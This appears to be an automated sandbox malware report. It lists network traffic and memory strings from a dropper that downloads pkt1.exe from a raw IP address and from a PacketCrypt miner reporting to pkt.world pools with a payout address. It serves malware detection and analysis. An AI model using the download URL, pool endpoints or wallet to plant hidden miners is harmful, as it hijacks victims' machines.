Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_526717b753447e06968a08abf68208310e1f5acaa1180a99cbda870ca2f03431.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_1b2f0c4a3739221fbf80e36dad285b3f61b60e1ff8ab442582de1d9af7630b85.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: 2e7be74dc6404e8eb9ecdc838f8e01b9host: pool.pkt.world

Source: global traffic	DNS traffic detected: DNS query: pool.pkt.world
Source: global traffic	DNS traffic detected: DNS query: any.ah.pkt.world

Source: unknown

HTTP traffic detected: POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2837096accept: */*host: any.ah.pkt.worldtransfer-encoding: chunked

Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://.css
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://.jpg
Source: dr0p.exe, 00000000.00000002.2022627403.0000000000420000.00000040.00000001.01000000.00000003.sdmp, dr0p.exe, 00000000.00000002.2024733602.0000000005855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/pkt1.exe
Source: packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.wor
Source: packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.worK
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?c
Source: packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7#
Source: packetcrypt.exe, 00000006.00000003.3110476858.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690678950.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691697981.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3517453778.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3109839550.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3515565970.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691808111.00000239E3F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e99409592
Source: packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c425
Source: pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D45000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.wo
Source: packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay11
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay6
Source: packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay=2c
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2649923389.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2673224837.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2651717140.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2662607746.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payA
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payMT
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114266001.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103160808.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payg.json
Source: packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payg.json7
Source: packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkd
Source: packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547416911.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2561511282.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.F
Source: pkt1.exe, 00000004.00000002.4110767901.000001DA4AED0000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4112163975.000001DA50000000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, pkt1.exe, 00000004.00000002.4112163975.000001DA50015000.00000004.00001000.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1266000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12FB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1240000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110479379.00000239E15A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world
Source: packetcrypt.exe, 00000006.00000003.3110476858.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D45000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690678950.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691697981.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3517453778.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3109839550.00000239E3F23000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3515565970.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691808111.00000239E3F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/
Source: packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submE
Source: packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit
Source: packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit&
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit(
Source: packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit1
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3814187859.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813889929.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit;
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitK
Source: packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2649923389.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2673224837.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2651717140.00000239E3F22000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2662607746.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitL
Source: packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submith
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitm32
Source: packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3516516814.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2766217131.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2330920987.00000239E3F4B000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3314559971.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2234579921.00000239E3EC9000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2770879271.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547344330.00000239E3F3D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2331175814.00000239E3F68000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771207181.00000239E401B000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F3E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103160808.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json
Source: packetcrypt.exe, 00000006.00000003.2673079242.00000239E4013000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771207181.00000239E401B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json-
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json/
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3314559971.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json1
Source: packetcrypt.exe, 00000006.00000003.2673122820.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2650949600.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json2
Source: packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json8
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.jsonK
Source: packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.jsonw
Source: packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.jsony
Source: packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master&
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master)
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master.json
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3917303488.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master.jsonX
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master.jsonv
Source: packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master/blkinfo_1b2f0c4a3739221fbf80e36dad285b3f61b60e1ff8ab442582de1d9af7630b8
Source: packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master/blkinfo_526717b753447e06968a08abf68208310e1f5acaa1180a99cbda870ca2f0343
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E1289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master/blkinfo_e21c206fb56ab02307270f6e5a7a0ada30138fb95f832f7d4b09d83d9cd3a8f
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master2
Source: packetcrypt.exe, 00000006.00000003.2234579921.00000239E3EC9000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2329814904.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3814187859.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813889929.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2331175814.00000239E3F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master9
Source: packetcrypt.exe, 00000006.00000003.2972074759.00000239E3F3F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2770968426.00000239E3F3A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2766217131.00000239E3F3A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771171413.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2972211374.00000239E3F41000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2785256145.00000239E3F3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master;
Source: packetcrypt.exe, 00000006.00000003.2972152073.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2969163094.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master=2;
Source: packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterD
Source: packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterT
Source: packetcrypt.exe, 00000006.00000003.3225654784.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterTz
Source: packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterbmitn
Source: packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4114182517.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterdate=2
Source: packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterdate=2fVS
